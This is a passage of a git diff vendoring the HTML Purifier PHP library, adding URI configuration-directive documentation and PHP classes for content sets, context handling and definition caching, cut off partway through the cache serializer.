/dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefaultScheme.txt @@ -0,0 +1,10 @@ +URI.DefaultScheme +TYPE: string +DEFAULT: 'http' +--DESCRIPTION-- + +<p> + Defines through what scheme the output will be served, in order to + select the proper object validator when no scheme information is present. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionID.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionID.txt new file mode 100644 index 000000000..f05312ba8 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionID.txt @@ -0,0 +1,11 @@ +URI.DefinitionID +TYPE: string/null +VERSION: 2.1.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + Unique identifier for a custom-built URI definition. If you want + to add custom URIFilters, you must specify this value. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionRev.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionRev.txt new file mode 100644 index 000000000..80cfea93f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DefinitionRev.txt @@ -0,0 +1,11 @@ +URI.DefinitionRev +TYPE: int +VERSION: 2.1.0 +DEFAULT: 1 +--DESCRIPTION-- + +<p> + Revision identifier for your custom definition. See + %HTML.DefinitionRev for details. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Disable.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Disable.txt new file mode 100644 index 000000000..71ce025a2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Disable.txt @@ -0,0 +1,14 @@ +URI.Disable +TYPE: bool +VERSION: 1.3.0 +DEFAULT: false +--DESCRIPTION-- + +<p> + Disables all URIs in all forms. Not sure why you'd want to do that + (after all, the Internet's founded on the notion of a hyperlink). +</p> + +--ALIASES-- +Attr.DisableURI +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternal.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternal.txt new file mode 100644 index 000000000..13c122c8c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternal.txt @@ -0,0 +1,11 @@ +URI.DisableExternal +TYPE: bool +VERSION: 1.2.0 +DEFAULT: false +--DESCRIPTION-- +Disables links to external websites. This is a highly effective anti-spam +and anti-pagerank-leech measure, but comes at a hefty price: nolinks or +images outside of your domain will be allowed. Non-linkified URIs will +still be preserved. If you want to be able to link to subdomains or use +absolute URIs, specify %URI.Host for your website. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternalResources.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternalResources.txt new file mode 100644 index 000000000..abcc1efd6 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableExternalResources.txt @@ -0,0 +1,13 @@ +URI.DisableExternalResources +TYPE: bool +VERSION: 1.3.0 +DEFAULT: false +--DESCRIPTION-- +Disables the embedding of external resources, preventing users from +embedding things like images from other hosts. This prevents access +tracking (good for email viewers), bandwidth leeching, cross-site request +forging, goatse.cx posting, and other nasties, but also results in a loss +of end-user functionality (they can't directly post a pic they posted from +Flickr anymore). Use it if you don't have a robust user-content moderation +team. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableResources.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableResources.txt new file mode 100644 index 000000000..f891de499 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.DisableResources.txt @@ -0,0 +1,15 @@ +URI.DisableResources +TYPE: bool +VERSION: 4.2.0 +DEFAULT: false +--DESCRIPTION-- +<p> + Disables embedding resources, essentially meaning no pictures. You can + still link to them though. See %URI.DisableExternalResources for why + this might be a good idea. +</p> +<p> + <em>Note:</em> While this directive has been available since 1.3.0, + it didn't actually start doing anything until 4.2.0. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Host.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Host.txt new file mode 100644 index 000000000..ee83b121d --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Host.txt @@ -0,0 +1,19 @@ +URI.Host +TYPE: string/null +VERSION: 1.2.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + Defines the domain name of the server, so we can determine whether or + an absolute URI is from your website or not. Not strictly necessary, + as users should be using relative URIs to reference resources on your + website. It will, however, let you use absolute URIs to link to + subdomains of the domain you post here: i.e. example.com will allow + sub.example.com. However, higher up domains will still be excluded: + if you set %URI.Host to sub.example.com, example.com will be blocked. + <strong>Note:</strong> This directive overrides %URI.Base because + a given page may be on a sub-domain, but you wish HTML Purifier to be + more relaxed and allow some of the parent domains too. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.HostBlacklist.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.HostBlacklist.txt new file mode 100644 index 000000000..0b6df7625 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.HostBlacklist.txt @@ -0,0 +1,9 @@ +URI.HostBlacklist +TYPE: list +VERSION: 1.3.0 +DEFAULT: array() +--DESCRIPTION-- +List of strings that are forbidden in the host of any URI. Use it to kill +domain names of spam, etc. Note that it will catch anything in the domain, +so <tt>moo.com</tt> will catch <tt>moo.com.example.com</tt>. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MakeAbsolute.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MakeAbsolute.txt new file mode 100644 index 000000000..4214900a5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MakeAbsolute.txt @@ -0,0 +1,13 @@ +URI.MakeAbsolute +TYPE: bool +VERSION: 2.1.0 +DEFAULT: false +--DESCRIPTION-- + +<p> + Converts all URIs into absolute forms. This is useful when the HTML + being filtered assumes a specific base path, but will actually be + viewed in a different context (and setting an alternate base URI is + not possible). %URI.Base must be set for this directive to work. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt new file mode 100644 index 000000000..58c81dcc4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.Munge.txt @@ -0,0 +1,83 @@ +URI.Munge +TYPE: string/null +VERSION: 1.3.0 +DEFAULT: NULL +--DESCRIPTION-- + +<p> + Munges all browsable (usually http, https and ftp) + absolute URIs into another URI, usually a URI redirection service. + This directive accepts a URI, formatted with a <code>%s</code> where + the url-encoded original URI should be inserted (sample: + <code>http://www.google.com/url?q=%s</code>). +</p> +<p> + Uses for this directive: +</p> +<ul> + <li> + Prevent PageRank leaks, while being fairly transparent + to users (you may also want to add some client side JavaScript to + override the text in the statusbar). <strong>Notice</strong>: + Many security experts believe that this form of protection does not deter spam-bots. + </li> + <li> + Redirect users to a splash page telling them they are leaving your + website. While this is poor usability practice, it is often mandated + in corporate environments. + </li> +</ul> +<p> + Prior to HTML Purifier 3.1.1, this directive also enabled the munging + of browsable external resources, which could break things if your redirection + script was a splash page or used <code>meta</code> tags. To revert to + previous behavior, please use %URI.MungeResources. +</p> +<p> + You may want to also use %URI.MungeSecretKey along with this directive + in order to enforce what URIs your redirector script allows. Open + redirector scripts can be a security risk and negatively affect the + reputation of your domain name. +</p> +<p> + Starting with HTML Purifier 3.1.1, there is also these substitutions: +</p> +<table> + <thead> + <tr> + <th>Key</th> + <th>Description</th> + <th>Example <code><a href=""></code></th> + </tr> + </thead> + <tbody> + <tr> + <td>%r</td> + <td>1 - The URI embeds a resource<br />(blank) - The URI is merely a link</td> + <td></td> + </tr> + <tr> + <td>%n</td> + <td>The name of the tag this URI came from</td> + <td>a</td> + </tr> + <tr> + <td>%m</td> + <td>The name of the attribute this URI came from</td> + <td>href</td> + </tr> + <tr> + <td>%p</td> + <td>The name of the CSS property this URI came from, or blank if irrelevant</td> + <td></td> + </tr> + </tbody> +</table> +<p> + Admittedly, these letters are somewhat arbitrary; the only stipulation + was that they couldn't be a through f. r is for resource (I would have preferred + e, but you take what you can get), n is for name, m + was picked because it came after n (and I couldn't use a), p is for + property. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeResources.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeResources.txt new file mode 100644 index 000000000..6fce0fdc3 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeResources.txt @@ -0,0 +1,17 @@ +URI.MungeResources +TYPE: bool +VERSION: 3.1.1 +DEFAULT: false +--DESCRIPTION-- +<p> + If true, any URI munging directives like %URI.Munge + will also apply to embedded resources, such as <code><img src=""></code>. + Be careful enabling this directive if you have a redirector script + that does not use the <code>Location</code> HTTP header; all of your images + and other embedded resources will break. +</p> +<p> + <strong>Warning:</strong> It is strongly advised you use this in conjunction + %URI.MungeSecretKey to mitigate the security risk of an open redirector. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeSecretKey.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeSecretKey.txt new file mode 100644 index 000000000..0d00f62ea --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.MungeSecretKey.txt @@ -0,0 +1,30 @@ +URI.MungeSecretKey +TYPE: string/null +VERSION: 3.1.1 +DEFAULT: NULL +--DESCRIPTION-- +<p> + This directive enables secure checksum generation along with %URI.Munge. + It should be set to a secure key that is not shared with anyone else. + The checksum can be placed in the URI using %t. Use of this checksum + affords an additional level of protection by allowing a redirector + to check if a URI has passed through HTML Purifier with this line: +</p> + +<pre>$checksum === sha1($secret_key . ':' . $url)</pre> + +<p> + If the output is TRUE, the redirector script should accept the URI. +</p> + +<p> + Please note that it would still be possible for an attacker to procure + secure hashes en-mass by abusing your website's Preview feature or the + like, but this service affords an additional level of protection + that should be combined with website blacklisting. +</p> + +<p> + Remember this has no effect if %URI.Munge is not on. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.OverrideAllowedSchemes.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.OverrideAllowedSchemes.txt new file mode 100644 index 000000000..23331a4e7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.OverrideAllowedSchemes.txt @@ -0,0 +1,9 @@ +URI.OverrideAllowedSchemes +TYPE: bool +DEFAULT: true +--DESCRIPTION-- +If this is set to true (which it is by default), you can override +%URI.AllowedSchemes by simply registering a HTMLPurifier_URIScheme to the +registry. If false, you will also have to update that directive in order +to add more schemes. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt new file mode 100644 index 000000000..79084832b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/URI.SafeIframeRegexp.txt @@ -0,0 +1,22 @@ +URI.SafeIframeRegexp +TYPE: string/null +VERSION: 4.4.0 +DEFAULT: NULL +--DESCRIPTION-- +<p> + A PCRE regular expression that will be matched against an iframe URI. This is + a relatively inflexible scheme, but works well enough for the most common + use-case of iframes: embedded video. This directive only has an effect if + %HTML.SafeIframe is enabled. Here are some example values: +</p> +<ul> + <li><code>%^http://www.youtube.com/embed/%</code> - Allow YouTube videos</li> + <li><code>%^http://player.vimeo.com/video/%</code> - Allow Vimeo videos</li> + <li><code>%^http://(www.youtube.com/embed/|player.vimeo.com/video/)%</code> - Allow both</li> +</ul> +<p> + Note that this directive does not give you enough granularity to, say, disable + all <code>autoplay</code> videos. Pipe up on the HTML Purifier forums if this + is a capability you want. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/info.ini b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/info.ini new file mode 100644 index 000000000..5de4505e1 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/info.ini @@ -0,0 +1,3 @@ +name = "HTML Purifier" + +; vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ContentSets.php b/lib/htmlpurifier/library/HTMLPurifier/ContentSets.php new file mode 100644 index 000000000..3b6e96f5f --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ContentSets.php @@ -0,0 +1,155 @@ +<?php + +/** + * @todo Unit test + */ +class HTMLPurifier_ContentSets +{ + + /** + * List of content set strings (pipe seperators) indexed by name. + */ + public $info = array(); + + /** + * List of content set lookups (element => true) indexed by name. + * @note This is in HTMLPurifier_HTMLDefinition->info_content_sets + */ + public $lookup = array(); + + /** + * Synchronized list of defined content sets (keys of info) + */ + protected $keys = array(); + /** + * Synchronized list of defined content values (values of info) + */ + protected $values = array(); + + /** + * Merges in module's content sets, expands identifiers in the content + * sets and populates the keys, values and lookup member variables. + * @param $modules List of HTMLPurifier_HTMLModule + */ + public function __construct($modules) { + if (!is_array($modules)) $modules = array($modules); + // populate content_sets based on module hints + // sorry, no way of overloading + foreach ($modules as $module_i => $module) { + foreach ($module->content_sets as $key => $value) { + $temp = $this->convertToLookup($value); + if (isset($this->lookup[$key])) { + // add it into the existing content set + $this->lookup[$key] = array_merge($this->lookup[$key], $temp); + } else { + $this->lookup[$key] = $temp; + } + } + } + $old_lookup = false; + while ($old_lookup !== $this->lookup) { + $old_lookup = $this->lookup; + foreach ($this->lookup as $i => $set) { + $add = array(); + foreach ($set as $element => $x) { + if (isset($this->lookup[$element])) { + $add += $this->lookup[$element]; + unset($this->lookup[$i][$element]); + } + } + $this->lookup[$i] += $add; + } + } + + foreach ($this->lookup as $key => $lookup) { + $this->info[$key] = implode(' | ', array_keys($lookup)); + } + $this->keys = array_keys($this->info); + $this->values = array_values($this->info); + } + + /** + * Accepts a definition; generates and assigns a ChildDef for it + * @param $def HTMLPurifier_ElementDef reference + * @param $module Module that defined the ElementDef + */ + public function generateChildDef(&$def, $module) { + if (!empty($def->child)) return; // already done! + $content_model = $def->content_model; + if (is_string($content_model)) { + // Assume that $this->keys is alphanumeric + $def->content_model = preg_replace_callback( + '/\b(' . implode('|', $this->keys) . ')\b/', + array($this, 'generateChildDefCallback'), + $content_model + ); + //$def->content_model = str_replace( + // $this->keys, $this->values, $content_model); + } + $def->child = $this->getChildDef($def, $module); + } + + public function generateChildDefCallback($matches) { + return $this->info[$matches[0]]; + } + + /** + * Instantiates a ChildDef based on content_model and content_model_type + * member variables in HTMLPurifier_ElementDef + * @note This will also defer to modules for custom HTMLPurifier_ChildDef + * subclasses that need content set expansion + * @param $def HTMLPurifier_ElementDef to have ChildDef extracted + * @return HTMLPurifier_ChildDef corresponding to ElementDef + */ + public function getChildDef($def, $module) { + $value = $def->content_model; + if (is_object($value)) { + trigger_error( + 'Literal object child definitions should be stored in '. + 'ElementDef->child not ElementDef->content_model', + E_USER_NOTICE + ); + return $value; + } + switch ($def->content_model_type) { + case 'required': + return new HTMLPurifier_ChildDef_Required($value); + case 'optional': + return new HTMLPurifier_ChildDef_Optional($value); + case 'empty': + return new HTMLPurifier_ChildDef_Empty(); + case 'custom': + return new HTMLPurifier_ChildDef_Custom($value); + } + // defer to its module + $return = false; + if ($module->defines_child_def) { // save a func call + $return = $module->getChildDef($def); + } + if ($return !== false) return $return; + // error-out + trigger_error( + 'Could not determine which ChildDef class to instantiate', + E_USER_ERROR + ); + return false; + } + + /** + * Converts a string list of elements separated by pipes into + * a lookup array. + * @param $string List of elements + * @return Lookup array of elements + */ + protected function convertToLookup($string) { + $array = explode('|', str_replace(' ', '', $string)); + $ret = array(); + foreach ($array as $i => $k) { + $ret[$k] = true; + } + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Context.php b/lib/htmlpurifier/library/HTMLPurifier/Context.php new file mode 100644 index 000000000..9ddf0c547 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Context.php @@ -0,0 +1,82 @@ +<?php + +/** + * Registry object that contains information about the current context. + * @warning Is a bit buggy when variables are set to null: it thinks + * they don't exist! So use false instead, please. + * @note Since the variables Context deals with may not be objects, + * references are very important here! Do not remove! + */ +class HTMLPurifier_Context +{ + + /** + * Private array that stores the references. + */ + private $_storage = array(); + + /** + * Registers a variable into the context. + * @param $name String name + * @param $ref Reference to variable to be registered + */ + public function register($name, &$ref) { + if (isset($this->_storage[$name])) { + trigger_error("Name $name produces collision, cannot re-register", + E_USER_ERROR); + return; + } + $this->_storage[$name] =& $ref; + } + + /** + * Retrieves a variable reference from the context. + * @param $name String name + * @param $ignore_error Boolean whether or not to ignore error + */ + public function &get($name, $ignore_error = false) { + if (!isset($this->_storage[$name])) { + if (!$ignore_error) { + trigger_error("Attempted to retrieve non-existent variable $name", + E_USER_ERROR); + } + $var = null; // so we can return by reference + return $var; + } + return $this->_storage[$name]; + } + + /** + * Destorys a variable in the context. + * @param $name String name + */ + public function destroy($name) { + if (!isset($this->_storage[$name])) { + trigger_error("Attempted to destroy non-existent variable $name", + E_USER_ERROR); + return; + } + unset($this->_storage[$name]); + } + + /** + * Checks whether or not the variable exists. + * @param $name String name + */ + public function exists($name) { + return isset($this->_storage[$name]); + } + + /** + * Loads a series of variables from an associative array + * @param $context_array Assoc array of variables to load + */ + public function loadArray($context_array) { + foreach ($context_array as $key => $discard) { + $this->register($key, $context_array[$key]); + } + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Definition.php b/lib/htmlpurifier/library/HTMLPurifier/Definition.php new file mode 100644 index 000000000..c7f82eba4 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Definition.php @@ -0,0 +1,50 @@ +<?php + +/** + * Super-class for definition datatype objects, implements serialization + * functions for the class. + */ +abstract class HTMLPurifier_Definition +{ + + /** + * Has setup() been called yet? + */ + public $setup = false; + + /** + * If true, write out the final definition object to the cache after + * setup. This will be true only if all invocations to get a raw + * definition object are also optimized. This does not cause file + * system thrashing because on subsequent calls the cached object + * is used and any writes to the raw definition object are short + * circuited. See enduser-customize.html for the high-level + * picture. + */ + public $optimized = null; + + /** + * What type of definition is it? + */ + public $type; + + /** + * Sets up the definition object into the final form, something + * not done by the constructor + * @param $config HTMLPurifier_Config instance + */ + abstract protected function doSetup($config); + + /** + * Setup function that aborts if already setup + * @param $config HTMLPurifier_Config instance + */ + public function setup($config) { + if ($this->setup) return; + $this->setup = true; + $this->doSetup($config); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache.php new file mode 100644 index 000000000..c6e1e388c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache.php @@ -0,0 +1,108 @@ +<?php + +/** + * Abstract class representing Definition cache managers that implements + * useful common methods and is a factory. + * @todo Create a separate maintenance file advanced users can use to + * cache their custom HTMLDefinition, which can be loaded + * via a configuration directive + * @todo Implement memcached + */ +abstract class HTMLPurifier_DefinitionCache +{ + + public $type; + + /** + * @param $name Type of definition objects this instance of the + * cache will handle. + */ + public function __construct($type) { + $this->type = $type; + } + + /** + * Generates a unique identifier for a particular configuration + * @param Instance of HTMLPurifier_Config + */ + public function generateKey($config) { + return $config->version . ',' . // possibly replace with function calls + $config->getBatchSerial($this->type) . ',' . + $config->get($this->type . '.DefinitionRev'); + } + + /** + * Tests whether or not a key is old with respect to the configuration's + * version and revision number. + * @param $key Key to test + * @param $config Instance of HTMLPurifier_Config to test against + */ + public function isOld($key, $config) { + if (substr_count($key, ',') < 2) return true; + list($version, $hash, $revision) = explode(',', $key, 3); + $compare = version_compare($version, $config->version); + // version mismatch, is always old + if ($compare != 0) return true; + // versions match, ids match, check revision number + if ( + $hash == $config->getBatchSerial($this->type) && + $revision < $config->get($this->type . '.DefinitionRev') + ) return true; + return false; + } + + /** + * Checks if a definition's type jives with the cache's type + * @note Throws an error on failure + * @param $def Definition object to check + * @return Boolean true if good, false if not + */ + public function checkDefType($def) { + if ($def->type !== $this->type) { + trigger_error("Cannot use definition of type {$def->type} in cache for {$this->type}"); + return false; + } + return true; + } + + /** + * Adds a definition object to the cache + */ + abstract public function add($def, $config); + + /** + * Unconditionally saves a definition object to the cache + */ + abstract public function set($def, $config); + + /** + * Replace an object in the cache + */ + abstract public function replace($def, $config); + + /** + * Retrieves a definition object from the cache + */ + abstract public function get($config); + + /** + * Removes a definition object to the cache + */ + abstract public function remove($config); + + /** + * Clears all objects from cache + */ + abstract public function flush($config); + + /** + * Clears all expired (older version or revision) objects from cache + * @note Be carefuly implementing this method as flush. Flush must + * not interfere with other Definition types, and cleanup() + * should not be repeatedly called by userland code. + */ + abstract public function cleanup($config); + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator.php new file mode 100644 index 000000000..b0fb6d0cd --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator.php @@ -0,0 +1,62 @@ +<?php + +class HTMLPurifier_DefinitionCache_Decorator extends HTMLPurifier_DefinitionCache +{ + + /** + * Cache object we are decorating + */ + public $cache; + + public function __construct() {} + + /** + * Lazy decorator function + * @param $cache Reference to cache object to decorate + */ + public function decorate(&$cache) { + $decorator = $this->copy(); + // reference is necessary for mocks in PHP 4 + $decorator->cache =& $cache; + $decorator->type = $cache->type; + return $decorator; + } + + /** + * Cross-compatible clone substitute + */ + public function copy() { + return new HTMLPurifier_DefinitionCache_Decorator(); + } + + public function add($def, $config) { + return $this->cache->add($def, $config); + } + + public function set($def, $config) { + return $this->cache->set($def, $config); + } + + public function replace($def, $config) { + return $this->cache->replace($def, $config); + } + + public function get($config) { + return $this->cache->get($config); + } + + public function remove($config) { + return $this->cache->remove($config); + } + + public function flush($config) { + return $this->cache->flush($config); + } + + public function cleanup($config) { + return $this->cache->cleanup($config); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php new file mode 100644 index 000000000..d4cc35c4b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Cleanup.php @@ -0,0 +1,43 @@ +<?php + +/** + * Definition cache decorator class that cleans up the cache + * whenever there is a cache miss. + */ +class HTMLPurifier_DefinitionCache_Decorator_Cleanup extends + HTMLPurifier_DefinitionCache_Decorator +{ + + public $name = 'Cleanup'; + + public function copy() { + return new HTMLPurifier_DefinitionCache_Decorator_Cleanup(); + } + + public function add($def, $config) { + $status = parent::add($def, $config); + if (!$status) parent::cleanup($config); + return $status; + } + + public function set($def, $config) { + $status = parent::set($def, $config); + if (!$status) parent::cleanup($config); + return $status; + } + + public function replace($def, $config) { + $status = parent::replace($def, $config); + if (!$status) parent::cleanup($config); + return $status; + } + + public function get($config) { + $ret = parent::get($config); + if (!$ret) parent::cleanup($config); + return $ret; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Memory.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Memory.php new file mode 100644 index 000000000..18f16d32b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Memory.php @@ -0,0 +1,46 @@ +<?php + +/** + * Definition cache decorator class that saves all cache retrievals + * to PHP's memory; good for unit tests or circumstances where + * there are lots of configuration objects floating around. + */ +class HTMLPurifier_DefinitionCache_Decorator_Memory extends + HTMLPurifier_DefinitionCache_Decorator +{ + + protected $definitions; + public $name = 'Memory'; + + public function copy() { + return new HTMLPurifier_DefinitionCache_Decorator_Memory(); + } + + public function add($def, $config) { + $status = parent::add($def, $config); + if ($status) $this->definitions[$this->generateKey($config)] = $def; + return $status; + } + + public function set($def, $config) { + $status = parent::set($def, $config); + if ($status) $this->definitions[$this->generateKey($config)] = $def; + return $status; + } + + public function replace($def, $config) { + $status = parent::replace($def, $config); + if ($status) $this->definitions[$this->generateKey($config)] = $def; + return $status; + } + + public function get($config) { + $key = $this->generateKey($config); + if (isset($this->definitions[$key])) return $this->definitions[$key]; + $this->definitions[$key] = parent::get($config); + return $this->definitions[$key]; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Template.php.in b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Template.php.in new file mode 100644 index 000000000..21a8fcfda --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Decorator/Template.php.in @@ -0,0 +1,47 @@ +<?php + +require_once 'HTMLPurifier/DefinitionCache/Decorator.php'; + +/** + * Definition cache decorator template. + */ +class HTMLPurifier_DefinitionCache_Decorator_Template extends + HTMLPurifier_DefinitionCache_Decorator +{ + + var $name = 'Template'; // replace this + + function copy() { + // replace class name with yours + return new HTMLPurifier_DefinitionCache_Decorator_Template(); + } + + // remove methods you don't need + + function add($def, $config) { + return parent::add($def, $config); + } + + function set($def, $config) { + return parent::set($def, $config); + } + + function replace($def, $config) { + return parent::replace($def, $config); + } + + function get($config) { + return parent::get($config); + } + + function flush() { + return parent::flush(); + } + + function cleanup($config) { + return parent::cleanup($config); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Null.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Null.php new file mode 100644 index 000000000..41d97e734 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Null.php @@ -0,0 +1,39 @@ +<?php + +/** + * Null cache object to use when no caching is on. + */ +class HTMLPurifier_DefinitionCache_Null extends HTMLPurifier_DefinitionCache +{ + + public function add($def, $config) { + return false; + } + + public function set($def, $config) { + return false; + } + + public function replace($def, $config) { + return false; + } + + public function remove($config) { + return false; + } + + public function get($config) { + return false; + } + + public function flush($config) { + return false; + } + + public function cleanup($config) { + return false; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer.php b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer.php new file mode 100644 index 000000000..73d5e90a6 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/DefinitionCache/Serializer.php @@ -0,0 +1,191 @@ +<?php + +class HTMLPurifier_DefinitionCache_Serializer extends + HTMLPurifier_DefinitionCache +{ + + public function add($def, $config) { + if (!$this->checkDefType($def)) return; + $file = $this->generateFilePath($config); + if (file_exists($file)) return false; + if (!$this->_prepareDir($config)) return false; + return $this->_write($file, serialize($def), $config); + } + + public function set($def, $config) { + if (!$this->checkDefType($def)) return; + $file = $this->generateFilePath($config); + if (!$this->_prepareDir($config)) return false; + return $this->_write($file, serialize($def), $config); + } + + public function replace($def, $config) { + if (!$this->checkDefType($def)) return; + $file = $this->generateFilePath($config); + if (!file_exists($file)) return false; + if (!$this->_prepareDir($config)) return false; + return $this->_write($file, serialize($def), $config); + } + + public function get($config) { + $file = $this->generateFilePath($config); + if (!file_exists($file)) return false; + return unserialize(file_get_contents($file)); + } + + public function remove($config) { + $file = $this->generateFilePath($config); + if (!file_exists($file)) return false; + return unlink($file); + } + + public function flush($config) { + if (!$this->_prepareDir($config)) return false; + $dir = $this->generateDirectoryPath($config); + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) { + if (empty($filename)) continue; + if ($filename[0] === '.') continue; + unlink($dir . '/' . $filename); + } + } + + public function cleanup($config) { + if (!$this->_prepareDir($config)) return false; + $dir = $this->generateDirectoryPath($config); + $dh = opendir($dir); + while (false !== ($filename = readdir($dh))) { + if (empty($filename)) continue; + if ($filename[0] === '.') continue; + $key = substr($filename, 0, strlen($filename) - 4); + if ($this->isOld($key, $config)) unlink($dir . '/' . $filename); + } + } + + /** + * Generates the file path to the serial file corresponding to + * the configuration and definition name + * @todo Make protected + */ + public function generateFilePath($config) { + $key = $this->generateKey($config); + return $this->generateDirectoryPath($config) . '/' . $key . '.ser'; + } + + /** + * Generates the path to the directory contain this cache's serial files + * @note No trailing slash + * @todo Make protected + */ + public function generateDirectoryPath($config) { + $base = $this->generateBaseDirectoryPath($config); + return $base . '/' . $this->type; + } 